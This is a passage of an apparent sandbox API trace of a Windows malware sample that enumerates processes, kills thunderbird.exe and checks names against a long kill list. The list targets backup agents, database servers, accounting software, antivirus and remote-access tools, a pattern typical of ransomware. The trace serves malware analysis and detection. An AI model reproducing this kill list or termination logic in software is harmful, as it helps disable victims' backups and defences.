Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fbi-conflicts.exe")) returned 1 [0065.194] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="madisoncorn.exe")) returned 1 [0065.195] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="treaty restoration.exe")) returned 1 [0065.196] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ministries_vegetable_facilitate.exe")) returned 1 [0065.196] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0065.197] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0065.197] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0065.198] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0065.199] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0065.200] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0065.201] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0065.201] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x534, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0065.202] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0065.203] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0065.203] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0065.204] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0065.204] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0065.205] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0065.206] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0065.207] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0065.207] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0065.208] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0065.209] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0065.210] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0065.211] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0065.212] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0065.214] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0065.215] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0065.217] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0065.218] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0065.219] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0065.219] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0065.220] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0065.221] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0065.222] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0065.223] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0065.224] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0065.225] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0065.226] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0065.227] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0065.228] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0065.229] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0065.230] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0065.231] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0065.232] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0065.233] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0065.233] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reunion fabrics fed.exe")) returned 1 [0065.234] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="work_merchants_mighty.exe")) returned 1 [0065.234] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="substances.exe")) returned 1 [0065.235] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="holy.exe")) returned 1 [0065.236] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="debut-debate-acquisition.exe")) returned 1 [0065.237] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0065.237] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0065.238] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0065.238] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0065.239] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0065.240] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcrqdk.exe")) returned 1 [0065.240] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.241] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0065.241] CloseHandle (hObject=0x198) returned 1 [0065.241] GetCurrentProcessId () returned 0x2a8 [0065.241] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=1, dwProcessId=0x87c) returned 0x198 [0065.241] TerminateProcess (hProcess=0x198, uExitCode=0x1) returned 1 [0065.242] CloseHandle (hObject=0x198) returned 1 [0065.242] wvsprintfA (in: param_1=0x219e5f8, param_2="Killed process: %s [pid: %ld]", arglist=0x219eb38 | out: param_1="Killed process: thunderbird.exe [pid: 2172]") returned 43 [0065.242] wsprintfA (in: param_1=0x219e5f8, param_2="%s\r\n" | out: param_1="Killed process: thunderbird.exe [pid: 2172]\r\n") returned 45 [0065.242] GetLocalTime (in: lpSystemTime=0x219eaf8 | out: lpSystemTime=0x219eaf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x2f, wMilliseconds=0x393)) [0065.242] wsprintfA (in: param_1=0x219e9f8, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:47] ") returned 11 [0065.242] SetThreadUILanguage (LangId=0x409) returned 0x409 [0065.242] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0065.242] WriteFile (in: hFile=0x7, lpBuffer=0x219e9f8*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x219eb24, lpOverlapped=0x0 | out: lpBuffer=0x219e9f8*, lpNumberOfBytesWritten=0x219eb24*=0xb, lpOverlapped=0x0) returned 1 [0065.243] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0065.243] WriteFile (in: hFile=0x7, lpBuffer=0x219e5f8*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x219eb24, lpOverlapped=0x0 | out: lpBuffer=0x219e5f8*, lpNumberOfBytesWritten=0x219eb24*=0x2d, lpOverlapped=0x0) returned 1 [0065.243] GetConsoleWindow () returned 0x5011c [0065.243] IsWindowVisible (hWnd=0x5011c) returned 0 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="visio") returned -1 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="winword") returned -1 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="wordpad") returned -1 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="bedbh") returned 1 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="vxmon") returned -1 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="benetns") returned 1 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="bengien") returned 1 [0065.243] lstrcmpiA (lpString1="thunderbird", lpString2="pvlsvr") returned 1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="beserver") returned 1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="raw_agent_svc") returned 1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="vsnapvss") returned -1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="CagService") returned 1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="DellSystemDetect") returned 1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="EnterpriseClient") returned 1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="VeeamNFSSvc") returned -1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="VeeamTransportSvc") returned -1 [0065.244] lstrcmpiA (lpString1="thunderbird", lpString2="VeeamDeploymentSvc") returned -1 [0065.244] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0065.245] PathRemoveExtensionA (in: pszPath="totalcmd.exe" | out: pszPath="totalcmd") [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="wxServer") returned -1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="wxServerView") returned -1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="Sqlservr") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="RAgui") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="supervise") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="Culture") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="RTVscan") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="Defwatch") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="sqlbrowser") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="winword") returned -1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="QBW32") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="QBDBMgr") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="qbupdate") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="QBCFMonitorService") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="axlbridge") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="QBIDPService") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="httpd") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="fdlauncher") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="MsDtSrvr") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="tomcat6") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="java") returned 1 [0065.245] lstrcmpiA (lpString1="totalcmd", lpString2="360se") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="360doctor") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="wdswfsafe") returned -1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="fdhost") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="GDscan") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="ZhuDongFangYu") returned -1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="QBDBMgrN") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="sqlwriter") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="mysqld") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="AutodeskDesktopApp") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="acwebbrowser") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="Creative Cloud") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="Adobe Desktop Service") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="CoreSync") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="Adobe CEF Helper") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="node") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="AdobeIPCBroker") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="sync-taskbar") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="sync-worker") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="InputPersonalization") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="AdobeCollabSync") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="BrCtrlCntr") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="BrCcUxSys") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="SimplyConnectionManager") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="Simply.SystemTrayIcon") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="fbguard") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="fbserver") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="ONENOTEM") returned 1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="YooIT") returned -1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="wsa_service") returned -1 [0065.246] lstrcmpiA (lpString1="totalcmd", lpString2="koaly-exp-engine-service") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="TeamViewer_Service") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="TeamViewer") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="tv_w32") returned -1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="tv_x64") returned -1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="TitanV") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="Ssms") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="notepad") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="RdrCEF") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="sam") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", 